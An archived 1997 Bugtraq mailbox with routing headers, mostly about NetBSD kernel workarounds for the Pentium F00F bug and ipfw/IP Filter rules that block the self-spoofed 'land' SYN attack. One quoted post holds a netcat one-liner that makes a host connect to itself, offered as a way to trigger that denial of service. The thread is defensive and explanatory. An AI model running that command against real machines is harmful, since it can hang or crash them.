Received: from bikini.ai.mit.edu (bikini.ai.mit.edu [128.52.32.254]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id KAA12812 for
          <BUGTRAQ@NETSPACE.ORG.>; Fri, 14 Nov 1997 10:47:28 -0500
Received: (from mycroft@localhost) by bikini.ai.mit.edu (8.8.7/8.8.6) id
          KAA23755; Fri, 14 Nov 1997 10:50:53 -0500 (EST)
References: <199711120037.RAA00861@coke.> <el2oh3nvc0i.fsf@bikini.ai.mit.edu.>
Lines: 35
X-Mailer: Gnus v5.3/Emacs 19.34
Message-Id: <el2k9ebv5ia.fsf@bikini.ai.mit.edu.>
Date: 	Fri, 14 Nov 1997 10:50:53 -0500
Reply-To: "Charles M. Hannum" <mycroft@MIT.EDU.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: "Charles M. Hannum" <mycroft@MIT.EDU.>
Subject:      Re: Pentium bug workaround in NetBSD (was Re: Intel Pentium Bug:
              BSDI Releases a patch)
X-Cc:         [email protected]
To: [email protected]
In-Reply-To:  [email protected]'s message of 14 Nov 1997 08:30:21 -0500
Status:   
X-PMFLAGS: 33554560 0

> It occurs to me that there may be another way to solve this -- [...]

An addendum to the previous:

Not quite all entries into the page fault handler will be due to user
instructions.  In particular, our partially mapped IDT may cause a
page fault during a normal trace trap.  This should not be reexcuted;
if we do so, we'll skip an instruction, which would screw the
debugger.  We should be able to differentiate this condition by
checking for the RF flag; if it's not set, then the trap wasn't due to
a particular instruction, and we should emulate it per the BSDI code.

Using the RF flag, though, we could also fix the BSDI hack to not have
the original caveats.  If RF is set, we know that a particular
instruction caused the fault, and we can always decode it to decide
what to do:

* If the page fault was for vectors 3-5, advance the PC past the
instruction, turn off the RF flag, and enter the fault handler for the
real exception.


* If the page fault was for vectors 0-2 or 6, and the instruction was
not INT, don't advance the PC, and enter the fault handler for the
real exception.


* If the page fault was for vectors 0-2 or 6, and the instruction was
INT, don't advance the PC, and enter the privileged instruction
handler.


(Change the above rules as appropriate if you care about what happens
with the undocumented INT01 instruction.)

[And now I'm really going to go sleep.  B-)]
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 29557 invoked from network); 14 Nov 1997 18:46:35 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 14 Nov 1997 18:46:35 -0000
Received: by scylla.sovam.com id AA07164
  (5.67b8s3p1/IDA-1.5 for [email protected]); Fri, 14 Nov 1997 20:53:14 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA06914
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Fri, 14 Nov 1997 20:48:47 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id WAA06190
        for <mc@CONJURER.TYUMEN.RU.>; Fri, 14 Nov 1997 22:48:01 +0500 (ES)
Received: from [email protected] (port 21775 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <1012-21249>; Fri, 14 Nov 1997 11:13:55 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5647158 for [email protected]; Fri, 14 Nov 1997 11:12:10
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          LAA14027 for <BUGTRAQ@NETSPACE.ORG.>; Fri, 14 Nov 1997 11:00:12 -0500
Received: from [email protected] (port 21775 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <96210-21249>; Fri, 14 Nov 1997
          11:00:09 -0500
Approved-By: [email protected]
Received: from bikini.ai.mit.edu (bikini.ai.mit.edu [128.52.32.254]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id JAA05884 for
          <BUGTRAQ@NETSPACE.ORG.>; Fri, 14 Nov 1997 09:46:02 -0500
Received: (from mycroft@localhost) by bikini.ai.mit.edu (8.8.7/8.8.6) id
          JAA23710; Fri, 14 Nov 1997 09:49:28 -0500 (EST)
References: <199711120037.RAA00861@coke.> <el2oh3nvc0i.fsf@bikini.ai.mit.edu.>
Lines: 39
X-Mailer: Gnus v5.3/Emacs 19.34
Message-Id: <el2lnyrv8co.fsf@bikini.ai.mit.edu.>
Date: 	Fri, 14 Nov 1997 09:49:27 -0500
Reply-To: "Charles M. Hannum" <mycroft@MIT.EDU.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: "Charles M. Hannum" <mycroft@MIT.EDU.>
Subject:      Re: Pentium bug workaround in NetBSD (was Re: Intel Pentium Bug:
              BSDI Releases a patch)
X-Cc:         [email protected]
To: [email protected]
In-Reply-To:  [email protected]'s message of 14 Nov 1997 08:30:21 -0500
Status:   
X-PMFLAGS: 33554560 0

It occurs to me that there may be another way to solve this -- with a
slightly higher performance penalty.  To put it simply: return to user
mode and let the instruction be executed again.

To make this work, I suggest:

* Create the partially mapped IDT as per the BSDI patch.  Use it.


* Create a second copy of the IDT that it fully mapped.  For each
vector in this second copy, install a routine which first reloads the
IDT pointer to point to the partially mapped IDT and then uses the
normal routine.


* When we get a page fault, check to see if the fault was in the
second IDT, and if so turn off interrupts (with a CLI), load the
pointer to the first IDT, gratuitously fetch the IDT descriptor for
exception 6 to make sure it's in the cache, and return to user mode
(doing an implicit CLI during the IRET).


The theory is that we reexecute the faulting instruction with a
normal-looking IDT, making sure that the descriptor is in the L1
cache, so we don't get the hang.  The only way it would get rotated
out of the cache before the instruction is reexecuted would be if an
interrupt or exception occurs (i.e. some other code is caused to
execute) between when we reload the IDT pointer to the fully mapped
IDT and when the instruction is reexecuted.  To prevent this, we
arrange for any such interrupt or exception to cause the partially
mapped IDT to be loaded again, and thus when the interrupt or
exception completes, the instruction would cause another page fault.

This has a bit more performance impact on debuggers (because trace and
breakpoint traps are handled through this mechanism, with an
additional ~100 cycles on a 486), but it shouldn't have any of the
caveats I previously mentioned.

[I'd implement this right now and try it, but I *really* have to go
sleep now.  Recovering from a cold.  *sigh*]
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 29556 invoked from network); 14 Nov 1997 18:46:35 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 14 Nov 1997 18:46:35 -0000
Received: by scylla.sovam.com id AA07156
  (5.67b8s3p1/IDA-1.5 for [email protected]); Fri, 14 Nov 1997 20:53:08 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA06878
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Fri, 14 Nov 1997 20:48:18 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id WAA06186
        for <mc@CONJURER.TYUMEN.RU.>; Fri, 14 Nov 1997 22:47:35 +0500 (ES)
Received: from [email protected] (port 21775 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <97044-21248>; Fri, 14 Nov 1997 11:05:42 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5646849 for [email protected]; Fri, 14 Nov 1997 11:02:08
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          KAA13212 for <BUGTRAQ@NETSPACE.ORG.>; Fri, 14 Nov 1997 10:50:16 -0500
Received: from [email protected] (port 21775 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <81314-21248>; Fri, 14 Nov 1997
          10:50:13 -0500
Approved-By: [email protected]
Received: from bikini.ai.mit.edu (bikini.ai.mit.edu [128.52.32.254]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id IAA31827 for
          <BUGTRAQ@NETSPACE.ORG.>; Fri, 14 Nov 1997 08:27:02 -0500
Received: (from mycroft@localhost) by bikini.ai.mit.edu (8.8.7/8.8.6) id
          IAA23653; Fri, 14 Nov 1997 08:30:22 -0500 (EST)
References: <199711120037.RAA00861@coke.>
Lines: 35
X-Mailer: Gnus v5.3/Emacs 19.34
Message-Id: <el2oh3nvc0i.fsf@bikini.ai.mit.edu.>
Date: 	Fri, 14 Nov 1997 08:30:21 -0500
Reply-To: "Charles M. Hannum" <mycroft@mit.edu.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: "Charles M. Hannum" <mycroft@mit.edu.>
Subject:      Pentium bug workaround in NetBSD (was Re: Intel Pentium Bug: BSDI
              Releases a patch)
X-Cc:         [email protected]
To: [email protected]
In-Reply-To:  Joe Ilacqua's message of Tue, 11 Nov 1997 17:36:59 -0700
Status:   
X-PMFLAGS: 33554560 0

FYI, I put a patch similar in nature to the BSDI one in the NetBSD
kernel.  It seems to work, and crashme has been unable to crash my
machine so far.  However, I note three caveats to this approach:

* With this workaround, it's impossible for the kernel to distinguish
whether exceptions 0-2 and 6 occured due to an INT ${0-2,6}
instruction or due to their normal causes.  Without the workaround, an
INT ${0-2,6} instruction would normally cause a protection fault, in
turn causing the process to get a SIGBUS, because the descriptors for
these exceptions are marked as not being callable by user code.
Instead the process will get a SIGFPE, SIGTRAP, SIGBUS, or SIGILL,
depending on which of INT ${0-2,6} was executed.


* There's also no way to distinguish whether we got exceptions 3-4 due
to an INT3 or INTO instruction, or due to an INT ${3-4} instruction,
without actually inspecting the user code.  Ideally, we want to know
this so we can advance the PC the right amount; the page fault is a
restartable exception, and the saved PC points to the {INT3,INTO,INT
$N} instruction, whereas these instructions normally cause the
exception to be taken after the PC has been advanced.  Currently I
just patch the PC as if the exception always occured due to INT3 or
INTO, since no real code uses INT ${3-4}, or uses a prefix on them,
and I'd rather not slow down this path much more to check.


* The previous also applies to the exception 5 and the BOUND
instruction, which I haven't fully dealt with as of this writing.  (It
actually uses the operand size prefix, so it needs to be decoded.
YUCK.)


Note that since VM86 mode always traps INT instructions via a GP
fault, code running in VM86 mode is unaffected by this.  In the all
too likely event that some whacked out DOS program actually uses INT
${0-6}, its behaviour inside doscmd or dosemu should not change.
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 10899 invoked from network); 17 Nov 1997 01:01:34 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 17 Nov 1997 01:01:34 -0000
Received: by scylla.sovam.com id AA11140
  (5.67b8s3p1/IDA-1.5 for [email protected]); Mon, 17 Nov 1997 01:59:30 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA11006
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Mon, 17 Nov 1997 01:55:28 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id DAA27391
        for <mc@CONJURER.TYUMEN.RU.>; Mon, 17 Nov 1997 03:55:11 +0500 (ES)
Received: from [email protected] (port 29760 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <96867-1726>; Sun, 16 Nov 1997 15:25:24 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5686204 for [email protected]; Sun, 16 Nov 1997 15:22:17
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          PAA19206 for <BUGTRAQ@NETSPACE.ORG.>; Sun, 16 Nov 1997 15:11:27 -0500
Received: from [email protected] (port 29760 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <81056-1726>; Sun, 16 Nov 1997
          15:11:20 -0500
Approved-By: [email protected]
Received: from out2.ibm.net (out2.ibm.net [165.87.194.229]) by netspace.org
          (8.8.7/8.8.2) with ESMTP id MAA04984 for <BUGTRAQ@NETSPACE.ORG.>; Sun,
          16 Nov 1997 12:24:02 -0500
Received: from ibm.net (slip202-135-5-117.jk.id.ibm.net [202.135.5.117]) by
          out2.ibm.net (8.8.5/8.6.9) with ESMTP id RAA178352 for
          <BUGTRAQ@NETSPACE.ORG.>; Sun, 16 Nov 1997 17:23:53 GMT
X-Mailer: Mozilla 4.04 [en] (Win95; U)
Mime-Version: 1.0
References: <199711120037.RAA00861@coke.> <el2oh3nvc0i.fsf@bikini.ai.mit.edu.>
            <el2k9ebv5ia.fsf@bikini.ai.mit.edu.>
            <el2200ivllb.fsf@bikini.ai.mit.edu.>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <346F2CE9.DB5A04C8@ibm.net.>
Date: 	Mon, 17 Nov 1997 00:27:06 +0700
Reply-To: [email protected]
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: Edwin Li-Kai Liu <robin.hood@ibm.net.>
Subject:      Re: Pentium bug workaround in NetBSD (was Re: Intel Pentium
              Bug:BSDI Releases a patch)
To: [email protected]
Status:   
X-PMFLAGS: 34078848 0

Charles M. Hannum wrote:

> Actually, that isn't quite true.  RF is always set when we get the
> page fault.  It turns out there's no way to distinguish a real trace
> trap from an INT 1 or ICEBP/INT01, and that full decoding of the BOUND
> instruction is not necessary because the saved PC points to the BOUND
> instruction itself.  Incorporating only these two changes, the
> processing rules I suggested would be more correctly stated as:

I disagree with the above statement. According to my note regarding INT1,
you can always get the INT1 status by DR6 debug register. The following is
the list of the meaning when these bits are set in DR6 (the note is for 386,
but I think it applies to later chips).

Bits - Reason
------------------------------------------------------
B0   - Breakpoint defined by DR0 is triggered.
B1   - Breakpoint defined by DR1 is triggered.
B2   - ...... by DR2 is triggered.
B3   - ...... by DR3 is triggered.
BD   - Intel ICE hardware is active and ICE is blocking the use of debug
registers.
BS   - Single step (TF is set)
BT   - Task switch (T bit in TSS is set).

This is what the bits look like:

_________________________________________________________________
|                               |B|B|B|                 |B|B|B|B|
|             0                 |T|S|D|        0        |3|2|1|0| DR6
-----------------------------------------------------------------
31                              16                              0

--

Robin Hood
Liu Li-Kai, Edwin

ICQ UIN: 1311717 (dolphin)

mailto:robin.hood@ibm.net.
-----------------------------------

Golden Rules for Living

  - If you open it, close it.
  - If you turn it on, turn it off.
  - If you unlock it, lock it up.
  - If you break it, admit it.
  - If you can't fix it, call in someone who can.
  - If you borrow it, return it.
  - If you value it, take care of it.
  - If you make a mess clean it up.
  - If you move it, put it back.
  - If it belongs to someone else and you want to use, get permission.
  - If you don't know how to operate it, leave it alone.
  - If it's none of your business, don't ask questions.
  - If it ain't broke, don't fix it.
  - If it will brighten someone's day, say it.
  - If it will tarnish someone's reputation, keep it to yourself.


By Source Unknown
from Condensed Chicken Soup for the Soul
Copyright 1996 by Jack Canfield, Mark Victor Hansen
& Patty Hansen
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 855 invoked from network); 21 Nov 1997 10:16:45 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 21 Nov 1997 10:16:45 -0000
Received: by scylla.sovam.com id AA08457
  (5.67b8s3p1/IDA-1.5 for [email protected]); Fri, 21 Nov 1997 12:07:41 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA07909
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Fri, 21 Nov 1997 12:02:52 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id NAA19465
        for <mc@CONJURER.TYUMEN.RU.>; Fri, 21 Nov 1997 13:59:57 +0500 (ES)
Received: from [email protected] (port 53767 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <96048-6399>; Fri, 21 Nov 1997 01:59:13 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5774520 for [email protected]; Fri, 21 Nov 1997 01:58:05
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          BAA06170 for <BUGTRAQ@NETSPACE.ORG.>; Fri, 21 Nov 1997 01:57:15 -0500
Received: from [email protected] (port 53767 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <80727-6401>; Fri, 21 Nov 1997
          01:57:12 -0500
Approved-By: [email protected]
Received: from panda.hilink.com.au (panda.hilink.com.au [203.8.15.25]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id UAA02440 for
          <bugtraq@netspace.org.>; Thu, 20 Nov 1997 20:49:49 -0500
Received: (from danny@localhost) by panda.hilink.com.au (8.8.5/8.8.5) id
          MAA18200; Fri, 21 Nov 1997 12:49:07 +1100 (EST)
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSF.3.91.971121123958.235N-100000@panda.hilink.com.au.>
Date: 	Fri, 21 Nov 1997 12:49:05 +1100
Reply-To: "Daniel O'Callaghan" <danny@PANDA.HILINK.COM.AU.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: "Daniel O'Callaghan" <danny@PANDA.HILINK.COM.AU.>
Subject:      Re: ipfw workaround for syn-loop attack, FreeBSD 2.2.5-STABLE
X-To:         Robert Watson <robert@cyrus.watson.org.>
X-Cc:         [email protected]
To: [email protected]
In-Reply-To:  <Pine.BSF.3.96.971120181102.12215A-100000@cyrus.watson.org.>
Status:   
X-PMFLAGS: 34078848 0

On Thu, 20 Nov 1997, Robert Watson wrote:

> Adding a rule for the interface denying packets from oneself appears to
> defend against the new attack.
>
> This rule worked:
> 03001 deny ip from 128.2.91.57 to 128.2.91.57 via ed0
> Where 128.2.91.57 is the host's IP address on device ed0.
>
> Adding this to rc.firewall on FreeBSD is also a good idea.  Multi-homed
> hosts require one entry per device, needless to say.

With terminal servers which have IP addresses which move from interface
to interface, the following rules are more generic:

----------------------------------------------
#!/bin/sh

/sbin/ipfw add 1 allow ip from any to any via lo0
for ip in 127.0.0.1 192.2.3.4 192.2.3.6 192.7.8.9
do
    /sbin/ipfw add 2 deny log ip from $ip to any in
done
-----------------------------------------------

The above will prevent all self-spoofing attacks.  The posted (and
merged) fix in tcp_input.c will not prevent attacks where packets are
formed to go from one interface to another on a multi-homed machine.
I have not verified that the multi-homed attack works, but my guess is
that it would.

Sigh.  I had made a start on reducing vulnerability to this sort of thing
in rc.firewall, but I had only got as far as 127.0.0.0/8 and had to get
back to money-earning work.  Looks like I should finish the job.

Danny
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 854 invoked from network); 21 Nov 1997 10:16:45 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 21 Nov 1997 10:16:45 -0000
Received: by scylla.sovam.com id AA08448
  (5.67b8s3p1/IDA-1.5 for [email protected]); Fri, 21 Nov 1997 12:07:36 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA07921
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Fri, 21 Nov 1997 12:02:58 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id OAA19509
        for <mc@CONJURER.TYUMEN.RU.>; Fri, 21 Nov 1997 14:00:05 +0500 (ES)
Received: from [email protected] (port 53767 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <96740-6400>; Fri, 21 Nov 1997 02:04:26 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5774854 for [email protected]; Fri, 21 Nov 1997 02:03:10
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          CAA07246 for <BUGTRAQ@NETSPACE.ORG.>; Fri, 21 Nov 1997 02:02:36 -0500
Received: from [email protected] (port 53767 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <96503-6398>; Fri, 21 Nov 1997
          02:02:30 -0500
Approved-By: [email protected]
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id WAA30890 for
          <bugtraq@netspace.org.>; Thu, 20 Nov 1997 22:54:21 -0500
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA249724286; Fri, 21 Nov
          1997 14:51:26 +1100
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Message-Id: <199711210354.WAA30890@netspace.org.>
Date: 	Fri, 21 Nov 1997 14:51:26 +1100
Reply-To: Darren Reed <avalon@COOMBS.ANU.EDU.AU.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: Darren Reed <avalon@COOMBS.ANU.EDU.AU.>
Subject:      Re: ipfw workaround for syn-loop attack, FreeBSD 2.2.5-STABLE
X-To:         Daniel O'Callaghan <danny@panda.hilink.com.au.>
X-Cc:         [email protected], [email protected]
To: [email protected]
In-Reply-To:  <Pine.BSF.3.91.971121123958.235N-100000@panda.hilink.com.au.> from
              "Daniel O'Callaghan" at Nov 21, 97 12:49:05 pm
Status:   
X-PMFLAGS: 33554560 0

There's a perl script called "mkfilters" distributed with IP filter which
will generate the appropriate list of configuration lines to prevent any
spoofed packets.  This is only recommended for use as a baseline to build
from, however.  The script does attempt to handle ppp interfaces, although
dynamic allocation of ppp numbers (both interface and IP#) can hamper any
efforts to do this sanely.

example output:

#
# The following routes should be configured, if not already:
#
# route add 10.1.1.1 localhost 0
#
block in log quick from any to any with ipopts
block in log quick proto tcp from any to any with short
pass out on le0 all head 250
block out from 127.0.0.0/8 to any group 250
block out from any to 127.0.0.0/8 group 250
block out from any to 10.1.1.1/32 group 250
pass in on le0 all head 200
block in from 127.0.0.0/8 to any group 200
block in from 10.1.1.1/32 to any group 200

where le0 is 10.1.1.1.

Darren
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 857 invoked from network); 21 Nov 1997 10:16:49 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 21 Nov 1997 10:16:49 -0000
Received: by scylla.sovam.com id AA08347
  (5.67b8s3p1/IDA-1.5 for [email protected]); Fri, 21 Nov 1997 12:06:57 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA07932
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Fri, 21 Nov 1997 12:03:10 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id OAA19514
        for <mc@CONJURER.TYUMEN.RU.>; Fri, 21 Nov 1997 14:00:15 +0500 (ES)
Received: from [email protected] (port 53767 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <550-6400>; Fri, 21 Nov 1997 02:08:28 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5774397 for [email protected]; Fri, 21 Nov 1997 02:05:47
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          BAA05302 for <BUGTRAQ@NETSPACE.ORG.>; Fri, 21 Nov 1997 01:54:15 -0500
Received: from [email protected] (port 53767 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <80815-6400>; Fri, 21 Nov 1997
          01:54:07 -0500
Approved-By: [email protected]
Received: from fledge.watson.org (FLEDGE.RES.CMU.EDU [128.2.91.116]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id SAA25450 for
          <bugtraq@netspace.org.>; Thu, 20 Nov 1997 18:11:47 -0500
Received: from cyrus.watson.org (cyrus.pr.watson.org [192.0.2.4]) by
          fledge.watson.org (8.8.8/8.6.10) with SMTP id SAA20637; Thu, 20 Nov
          1997 18:11:17 -0500 (EST)
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSF.3.96.971120181102.12215A-100000@cyrus.watson.org.>
Date: 	Thu, 20 Nov 1997 18:15:22 -0500
Reply-To: Robert Watson <robert@cyrus.watson.org.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: Robert Watson <robert@cyrus.watson.org.>
Subject:      ipfw workaround for syn-loop attack, FreeBSD 2.2.5-STABLE
X-To:         [email protected]
To: [email protected]
Status:   
X-PMFLAGS: 34078848 0

Adding a rule for the interface denying packets from oneself appears to
defend against the new attack.

This rule worked:

03001 deny ip from 128.2.91.57 to 128.2.91.57 via ed0

Where 128.2.91.57 is the host's IP address on device ed0.

This presumably works on other versions of FreeBSD, and other systems with
ipfw/ipfirewall installed on them.  As always, if you are not familiar
with ipfw and don't know how it works, don't use this unless you are on
the console the first time!

Adding this to rc.firewall on FreeBSD is also a good idea.  Multi-homed
hosts require one entry per device, needless to say.

  Robert N Watson

Junior, Logic+Computation, Carnegie Mellon University  http://www.cmu.edu/
Network Administrator, SafePort Network Services  http://www.safeport.com/
[email protected] [email protected] http://www.watson.org/~robert/
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 31889 invoked from network); 23 Nov 1997 01:01:33 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 23 Nov 1997 01:01:33 -0000
Received: by scylla.sovam.com id AA29743
  (5.67b8s3p1/IDA-1.5 for [email protected]); Sun, 23 Nov 1997 03:13:40 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA29652
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Sun, 23 Nov 1997 03:11:52 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id FAA27534
        for <mc@CONJURER.TYUMEN.RU.>; Sun, 23 Nov 1997 05:09:20 +0500 (ES)
Received: from [email protected] (port 19009 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <393-18068>; Sat, 22 Nov 1997 18:06:25 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5806784 for [email protected]; Sat, 22 Nov 1997 17:59:54
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          RAA31107 for <BUGTRAQ@NETSPACE.ORG.>; Sat, 22 Nov 1997 17:48:09 -0500
Received: from [email protected] (port 19009 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <97426-15161>; Sat, 22 Nov 1997
          17:47:55 -0500
Approved-By: [email protected]
Received: from bikini.ai.mit.edu (bikini.ai.mit.edu [128.52.32.254]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id OAA18769 for
          <BUGTRAQ@NETSPACE.ORG.>; Sat, 22 Nov 1997 14:17:56 -0500
Received: (from mycroft@localhost) by bikini.ai.mit.edu (8.8.7/8.8.6) id
          NAA08278; Sat, 22 Nov 1997 13:54:58 -0500 (EST)
References: <Pine.LNX.3.96.971122075830.2861B-100000@slartibartfast.sp.org.>
Lines: 21
X-Mailer: Gnus v5.3/Emacs 19.34
Message-Id: <el267pkn4hq.fsf@bikini.ai.mit.edu.>
Date: 	Sat, 22 Nov 1997 13:54:57 -0500
Reply-To: "Charles M. Hannum" <mycroft@MIT.EDU.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: "Charles M. Hannum" <mycroft@MIT.EDU.>
Subject:      Re: 44BSD port of land.c
X-To:         [email protected]
To: [email protected]
In-Reply-To:  Peter's message of Sat, 22 Nov 1997 08:00:52 +0000
Status:   
X-PMFLAGS: 33554560 0

Peter <deviant@UNIXNET.ORG.> writes:

>
> This seems to work, as long as you've got NetCat:
>
> -----
> #!/bin/bash
> nc -s $1 -p $2 $1 $2
> -----
>
> where $1 is the host, and $2 is the port (139,23, 25, whatever)

This is actually a separate bug.  It used to be that in the 4.4BSD
stack (and probably earlier versions) a TCP socket connecting to
itself would cause a SYN war, via a different code path than the
`land' sttack.  We fixed this a few years ago in NetBSD, and our fix
for the `land' attack (which I'll post about in a moment) still allows
a socket to connect to itself -- although truthfully I'm not sure how
useful this behaviour really is.
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 19630 invoked from network); 22 Nov 1997 09:01:32 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 22 Nov 1997 09:01:32 -0000
Received: by scylla.sovam.com id AA25681
  (5.67b8s3p1/IDA-1.5 for [email protected]); Sat, 22 Nov 1997 11:46:34 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA25647
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Sat, 22 Nov 1997 11:46:21 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id NAA10702
        for <mc@CONJURER.TYUMEN.RU.>; Sat, 22 Nov 1997 13:43:00 +0500 (ES)
Received: from [email protected] (port 64837 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <96428-11313>; Sat, 22 Nov 1997 03:19:32 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5808321 for [email protected]; Sat, 22 Nov 1997 03:18:03
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
